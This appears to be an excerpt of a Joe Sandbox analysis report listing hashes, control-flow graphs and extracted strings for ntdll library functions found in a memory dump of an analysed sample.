                                          • Opcode ID: f8162dc722bb6b3d28cf97c356723431a0bdb97f8d718a42c372a35cc5b4b338
                                          • Instruction ID: e9c4151e8e78e431dcd47248ab1f67f092773081811de516596b325806fed9c2
                                          • Opcode Fuzzy Hash: f8162dc722bb6b3d28cf97c356723431a0bdb97f8d718a42c372a35cc5b4b338
                                          • Instruction Fuzzy Hash: 1790023520150417D60071587608707010587D1201F55D812A0428518DD797C9796122
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 523a83327c0819ecf2cbedd5eb1c2660aff40c4132f4a081c314efe34f9e62b0
                                          • Instruction ID: b23661ee252a5c62502ae52b27041d322eee3fc1df11a849424dc52ef2bec934
                                          • Opcode Fuzzy Hash: 523a83327c0819ecf2cbedd5eb1c2660aff40c4132f4a081c314efe34f9e62b0
                                          • Instruction Fuzzy Hash: 7990023520150856D60071586504B46010587E1301F55C417A0128614D8756C9797522
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 71445531a1eabb19ef23dde36baf7b00e77abe6007c6ebd3d6fcea6dd7710d3e
                                          • Instruction ID: 9c2da616da7fd0fd7b5b565097e0d300f2dab9c0467db271e03b365c2cd3596a
                                          • Opcode Fuzzy Hash: 71445531a1eabb19ef23dde36baf7b00e77abe6007c6ebd3d6fcea6dd7710d3e
                                          • Instruction Fuzzy Hash: BD90023524150416D64171586504606010997D1241F95C413A0428514E8796CB7EAA62
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7b39a60516e3ae6e8f537022a7b4893aa5c7e8a56bc89e4851baee206164e7f4
                                          • Instruction ID: 5b3b499b06d6d3cb3182797091281675282c04217cd7e21fb08adf9a46a361b7
                                          • Opcode Fuzzy Hash: 7b39a60516e3ae6e8f537022a7b4893aa5c7e8a56bc89e4851baee206164e7f4
                                          • Instruction Fuzzy Hash: 1B900225242541665A45B1586504507410697E1241795C413A1418910C8667D97ED622
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3d7f8d2c33d2f70fc24fffdedb0562bbd6c4ca3aa7a4f3643b44af499f2dc23a
                                          • Instruction ID: 9e414f9a45bd11ea848e2a4679cc0869225eb99c0011de4304c48560e8bacbd7
                                          • Opcode Fuzzy Hash: 3d7f8d2c33d2f70fc24fffdedb0562bbd6c4ca3aa7a4f3643b44af499f2dc23a
                                          • Instruction Fuzzy Hash: D890023520150427D61171586604707010987D1241F95C813A0428518D9797CA7AA122
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c8c0c00de7163f20c408b820c1cb80d26fe1eb0b6191dd26ae0fd40daeffc0fd
                                          • Instruction ID: f26bfbdb3a9eaf6fdf959c9155ae58297176c4ea4310c7795f9eb91be443b3b5
                                          • Opcode Fuzzy Hash: c8c0c00de7163f20c408b820c1cb80d26fe1eb0b6191dd26ae0fd40daeffc0fd
                                          • Instruction Fuzzy Hash: 1B90022520554456D60075587508A06010587D1205F55D412A1068555DC776C979A132
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 936f0575b101f2d1bd30865f696c6c9614bdd3ea405b73716454190998b0edff
                                          • Instruction ID: 775006dcfd1f857e8041ef83a79502d1590b1a06574a8747e49c9a48a1574565
                                          • Opcode Fuzzy Hash: 936f0575b101f2d1bd30865f696c6c9614bdd3ea405b73716454190998b0edff
                                          • Instruction Fuzzy Hash: 2F90022D21350016D6807158750860A010587D2202F95D816A0019518CCA56C97D5322
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b5e46c5cdebeb73b0a9b537208479559fe08a5f70b1a89e40f9ecbc052c2c9e6
                                          • Instruction ID: 56a543188f7f878dcb24e6ebf4ef0ac2183c46b08d4821da78b4411526ec2206
                                          • Opcode Fuzzy Hash: b5e46c5cdebeb73b0a9b537208479559fe08a5f70b1a89e40f9ecbc052c2c9e6
                                          • Instruction Fuzzy Hash: 0190022530150017D640715875186064105D7E2301F55D412E0418514CDA56C97E5223
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction ID: bf930e38716045c785f9b118a2cebffd45aea427091449808151dc59c3b2adea
                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction Fuzzy Hash:

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1125 328e2890-328e28b3 1126 328e28b9-328e28cc 1125->1126 1127 3291a4bc-3291a4c0 1125->1127 1129 328e28ce-328e28d7 1126->1129 1130 328e28dd-328e28df 1126->1130 1127->1126 1128 3291a4c6-3291a4ca 1127->1128 1128->1126 1131 3291a4d0-3291a4d4 1128->1131 1129->1130 1132 3291a57e-3291a585 1129->1132 1133 328e28e1-328e28e5 1130->1133 1131->1126 1134 3291a4da-3291a4de 1131->1134 1132->1130 1135 328e28eb-328e28fa 1133->1135 1136 328e2988-328e298e 1133->1136 1134->1126 1137 3291a4e4-3291a4eb 1134->1137 1138 3291a58a-3291a58d 1135->1138 1139 328e2900-328e2905 1135->1139 1140 328e2908-328e290c 1136->1140 1141 3291a564-3291a56c 1137->1141 1142 3291a4ed-3291a4f4 1137->1142 1138->1140 1139->1140 1140->1133 1143 328e290e-328e291b 1140->1143 1141->1126 1144 3291a572-3291a576 1141->1144 1145 3291a4f6-3291a4fe 1142->1145 1146 3291a50b 1142->1146 1147 3291a592-3291a599 1143->1147 1148 328e2921 1143->1148 1144->1126 1150 3291a57c call 328f0050 1144->1150 1145->1126 1151 3291a504-3291a509 1145->1151 1152 3291a510-3291a536 call 328f0050 1146->1152 1156 3291a5a1-3291a5c9 call 328f0050 1147->1156 1149 328e2924-328e2926 1148->1149 1153 328e2928-328e292a 1149->1153 1154 328e2993-328e2995 1149->1154 1169 3291a55d-3291a55f 1150->1169 1151->1152 1152->1169 1158 328e292c-328e292e 1153->1158 1159 328e2946-328e2966 call 328f0050 1153->1159 1154->1153 1162 328e2997-328e29b1 call 328f0050 1154->1162 1158->1159 1166 328e2930-328e2944 call 328f0050 1158->1166 1174 328e2969-328e2974 1159->1174 1162->1174 1166->1159 1171 328e2981-328e2985 1169->1171 1174->1149 1176 328e2976-328e2979 1174->1176 1176->1156 1177 328e297f 1176->1177 1177->1171
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: bcbf23c09822073f4a2fc904d7ca434a9857e6c8203d0270ad87e8e855793e45
                                          • Instruction ID: 216592f76bec4b3fdf0099bdc6f97aa27d381ef907975fcf3d7ce799f6bb6547
                                          • Opcode Fuzzy Hash: bcbf23c09822073f4a2fc904d7ca434a9857e6c8203d0270ad87e8e855793e45
                                          • Instruction Fuzzy Hash: 16510BBEA0421ABFDB14DF9C8C9097EF7B8BB493417508169E8A9D3645D774DE00CBA0

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1178 32952410-32952433 1179 329524ec-329524ff 1178->1179 1180 32952439-3295243d 1178->1180 1182 32952501-3295250a 1179->1182 1183 32952513-32952515 1179->1183 1180->1179 1181 32952443-32952447 1180->1181 1181->1179 1186 3295244d-32952451 1181->1186 1182->1183 1184 3295250c 1182->1184 1185 32952517-3295251b 1183->1185 1184->1183 1187 3295251d-3295252c 1185->1187 1188 32952538-3295253e 1185->1188 1186->1179 1189 32952457-3295245b 1186->1189 1191 32952540 1187->1191 1192 3295252e-32952536 1187->1192 1193 32952543-32952547 1188->1193 1189->1179 1190 32952461-32952468 1189->1190 1194 329524b6-329524be 1190->1194 1195 3295246a-32952471 1190->1195 1191->1193 1192->1193 1193->1185 1196 32952549-32952556 1193->1196 1194->1179 1201 329524c0-329524c4 1194->1201 1197 32952484 1195->1197 1198 32952473-3295247b 1195->1198 1199 32952564 1196->1199 1200 32952558-32952562 1196->1200 1203 32952489-329524ab call 328f0510 1197->1203 1198->1179 1202 3295247d-32952482 1198->1202 1204 32952567-32952569 1199->1204 1200->1204 1201->1179 1205 329524c6-329524ea call 328f0510 1201->1205 1202->1203 1217 329524ae-329524b1 1203->1217 1207 3295258d-3295258f 1204->1207 1208 3295256b-3295256d 1204->1208 1205->1217 1210 32952591-32952593 1207->1210 1211 329525ae-329525d0 call 328f0510 1207->1211 1208->1207 1213 3295256f-3295258b call 328f0510 1208->1213 1210->1211 1215 32952595-329525ab call 328f0510 1210->1215 1223 329525d3-329525df 1211->1223 1213->1223 1215->1211 1221 32952615-32952619 1217->1221 1223->1204 1225 329525e1-329525e4 1223->1225 1226 329525e6-32952610 call 328f0510 1225->1226 1227 32952613 1225->1227 1226->1227 1227->1221
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: b7455912714bff2ae198ea76f3180de9ce625ca87b4d4c40585b2d1c9ed760e6
                                          • Instruction ID: 17165f295f9c22f50500421e3d50dd46fc43049ecca534587ac44329862ba6fc
                                          • Opcode Fuzzy Hash: b7455912714bff2ae198ea76f3180de9ce625ca87b4d4c40585b2d1c9ed760e6
                                          • Instruction Fuzzy Hash: B251E779F00645AEEB24CF5CCC9097FB7FDAB48241B608469E499DB641DAB4EA40C760

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1427 3297a670-3297a6e9 call 328b2410 * 2 RtlDebugPrintTimes 1433 3297a89f-3297a8c4 call 328b25b0 * 2 call 328e4c30 1427->1433 1434 3297a6ef-3297a6fa 1427->1434 1436 3297a724 1434->1436 1437 3297a6fc-3297a709 1434->1437 1438 3297a728-3297a734 1436->1438 1440 3297a70f-3297a715 1437->1440 1441 3297a70b-3297a70d 1437->1441 1442 3297a741-3297a743 1438->1442 1444 3297a7f3-3297a7f5 1440->1444 1445 3297a71b-3297a722 1440->1445 1441->1440 1446 3297a736-3297a73c 1442->1446 1447 3297a745-3297a747 1442->1447 1448 3297a81f-3297a821 1444->1448 1445->1438 1451 3297a73e 1446->1451 1452 3297a74c-3297a750 1446->1452 1447->1448 1453 3297a827-3297a834 1448->1453 1454 3297a755-3297a77d RtlDebugPrintTimes 1448->1454 1451->1442 1456 3297a86c-3297a86e 1452->1456 1457 3297a836-3297a843 1453->1457 1458 3297a85a-3297a866 1453->1458 1454->1433 1465 3297a783-3297a7a0 RtlDebugPrintTimes 1454->1465 1456->1448 1461 3297a845-3297a849 1457->1461 1462 3297a84b-3297a851 1457->1462 1459 3297a87b-3297a87d 1458->1459 1463 3297a870-3297a876 1459->1463 1464 3297a87f-3297a881 1459->1464 1461->1462 1466 3297a857 1462->1466 1467 3297a96b-3297a96d 1462->1467 1469 3297a8c7-3297a8cb 1463->1469 1470 3297a878 1463->1470 1468 3297a883-3297a889 1464->1468 1465->1433 1475 3297a7a6-3297a7cc RtlDebugPrintTimes 1465->1475 1466->1458 1467->1468 1472 3297a8d0-3297a8f4 RtlDebugPrintTimes 1468->1472 1473 3297a88b-3297a89d RtlDebugPrintTimes 1468->1473 1471 3297a99f-3297a9a1 1469->1471 1470->1459 1472->1433 1478 3297a8f6-3297a913 RtlDebugPrintTimes 1472->1478 1473->1433 1475->1433 1480 3297a7d2-3297a7d4 1475->1480 1478->1433 1487 3297a915-3297a944 RtlDebugPrintTimes 1478->1487 1481 3297a7f7-3297a80a 1480->1481 1482 3297a7d6-3297a7e3 1480->1482 1486 3297a817-3297a819 1481->1486 1484 3297a7e5-3297a7e9 1482->1484 1485 3297a7eb-3297a7f1 1482->1485 1484->1485 1485->1444 1485->1481 1488 3297a80c-3297a812 1486->1488 1489 3297a81b-3297a81d 1486->1489 1487->1433 1493 3297a94a-3297a94c 1487->1493 1490 3297a814 1488->1490 1491 3297a868-3297a86a 1488->1491 1489->1448 1490->1486 1491->1456 1494 3297a972-3297a985 1493->1494 1495 3297a94e-3297a95b 1493->1495 1496 3297a992-3297a994 1494->1496 1497 3297a963-3297a969 1495->1497 1498 3297a95d-3297a961 1495->1498 1499 3297a987-3297a98d 1496->1499 1500 3297a996 1496->1500 1497->1467 1497->1494 1498->1497 1501 3297a98f 1499->1501 1502 3297a99b-3297a99d 1499->1502 1500->1464 1501->1496 1502->1471
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: HEAP:
                                          • API String ID: 3446177414-2466845122
                                          • Opcode ID: 58498ce118f83170d1c030801ee67aae53e8d1b2c2a925a1df25fcccfdc1326c
                                          • Instruction ID: 04d00df4b7b0d3e45e9f68574773f78b50d950b5043a3253191e27132b855b16
                                          • Opcode Fuzzy Hash: 58498ce118f83170d1c030801ee67aae53e8d1b2c2a925a1df25fcccfdc1326c
                                          • Instruction Fuzzy Hash: E7A19B76A043118FE718CF28C890A5AB7E9FF88354F15496DE945DB320EB72EC46CB91

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1503 328d7630-328d7651 1504 328d768b-328d7699 call 328e4c30 1503->1504 1505 328d7653-328d766f call 328ae660 1503->1505 1510 328d7675-328d7682 1505->1510 1511 32914638 1505->1511 1512 328d769a-328d76a9 call 328d7818 1510->1512 1513 328d7684 1510->1513 1515 3291463f-32914645 1511->1515 1519 328d76ab-328d76c1 call 328d77cd 1512->1519 1520 328d7701-328d770a 1512->1520 1513->1504 1517 328d76c7-328d76d0 call 328d7728 1515->1517 1518 3291464b-329146b8 call 3292f290 call 328e9020 RtlDebugPrintTimes BaseQueryModuleData 1515->1518 1517->1520 1528 328d76d2 1517->1528 1518->1517 1535 329146be-329146c6 1518->1535 1519->1515 1519->1517 1523 328d76d8-328d76e1 1520->1523 1530 328d770c-328d770e 1523->1530 1531 328d76e3-328d76f2 call 328d771b 1523->1531 1528->1523 1532 328d76f4-328d76f6 1530->1532 1531->1532 1537 328d76f8-328d76fa 1532->1537 1538 328d7710-328d7719 1532->1538 1535->1517 1539 329146cc-329146d3 1535->1539 1537->1513 1540 328d76fc 1537->1540 1538->1537 1539->1517 1542 329146d9-329146e4 1539->1542 1541 329147be-329147d0 call 328e2c50 1540->1541 1541->1513 1544 329147b9 call 328e4d48 1542->1544 1545 329146ea-32914723 call 3292f290 call 328eaaa0 1542->1545 1544->1541 1552 32914725-32914736 call 3292f290 1545->1552 1553 3291473b-3291476b call 3292f290 1545->1553 1552->1520 1553->1517 1558 32914771-3291477f call 328ea770 1553->1558 1561 32914781-32914783 1558->1561 1562 32914786-329147a3 call 3292f290 call 3291cf9e 1558->1562 1561->1562 1562->1517 1567 329147a9-329147b2 1562->1567 1567->1558 1568 329147b4 1567->1568 1568->1517
                                          Strings
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 32914655
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 32914742
                                          • ExecuteOptions, xrefs: 329146A0
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 32914787
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 329146FC
                                          • Execute=1, xrefs: 32914713
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 32914725
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 0-484625025
                                          • Opcode ID: eb5677d26bb05eb58444a25933aede8667101aefc824c5034a8a993ff075d971
                                          • Instruction ID: d5837a0ddd0e46a441dc0d93825fbb256569a38496881b6cacc36188f5c0b1fe
                                          • Opcode Fuzzy Hash: eb5677d26bb05eb58444a25933aede8667101aefc824c5034a8a993ff075d971
                                          • Instruction Fuzzy Hash: 1351387D60031DBAFB109AA9EC85FA977B8EF09744F4004A9D509A7181EF70AA49CF50
                                          Strings
                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 329079FA
                                          • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 32907AE6
                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 329079D0, 329079F5
                                          • Actx , xrefs: 32907A0C, 32907A73
                                          • SsHd, xrefs: 328BA3E4
                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 329079D5
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                          • API String ID: 0-1988757188
                                          • Opcode ID: de112ae8ba339c23a6f82abc3ce60d9a3b34090c28691faff4081fc865670f72
                                          • Instruction ID: ea305a6b3726ba76ee467eef20277c6fc5a7bce9e2a709423388a6bd0153d87c
                                          • Opcode Fuzzy Hash: de112ae8ba339c23a6f82abc3ce60d9a3b34090c28691faff4081fc865670f72
                                          • Instruction Fuzzy Hash: 9DE1E7B86043058FEB14CE28C884B9A7BE5BF89368F544A2DEC65CB391DB31D945CB51
                                          APIs
                                          Strings
                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 3290936B
                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 32909341, 32909366
                                          • Actx , xrefs: 32909508
                                          • GsHd, xrefs: 328BD874
                                          • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 32909565
                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32909346
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                          • API String ID: 3446177414-2196497285
                                          • Opcode ID: a08cbe7669d2d8a20ca56d8afce91028e25951e8639c51ab0e8d1bc4014e4a03
                                          • Instruction ID: da4fe8f0c66b2673bf28c0b9761ecaaea5961e97477bc8652b2f46519b7ba1ca
                                          • Opcode Fuzzy Hash: a08cbe7669d2d8a20ca56d8afce91028e25951e8639c51ab0e8d1bc4014e4a03
                                          • Instruction Fuzzy Hash: 0BE18E78604346AFEB14CF14C480B5AB7E8BF8975CF404A2DE8998B381DB71E944CF52
                                          APIs
                                          • RtlDebugPrintTimes.NTDLL ref: 3289656C
                                            • Part of subcall function 328965B5: RtlDebugPrintTimes.NTDLL ref: 32896664
                                            • Part of subcall function 328965B5: RtlDebugPrintTimes.NTDLL ref: 328966AF
                                          Strings
                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 328F99ED
                                          • minkernel\ntdll\ldrinit.c, xrefs: 328F9A11, 328F9A3A
                                          • LdrpInitShimEngine, xrefs: 328F99F4, 328F9A07, 328F9A30
                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 328F9A01
                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 328F9A2A
                                          • apphelp.dll, xrefs: 32896496
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-204845295
                                          • Opcode ID: 05cd018102d2d39e6498248681afab4b5ff230a8d454c80fcd43acafaf26af4f
                                          • Instruction ID: c705b1402623671d614937ccb2bdea9087b8d5532f878f92f8f88fdd07b9f29d
                                          • Opcode Fuzzy Hash: 05cd018102d2d39e6498248681afab4b5ff230a8d454c80fcd43acafaf26af4f
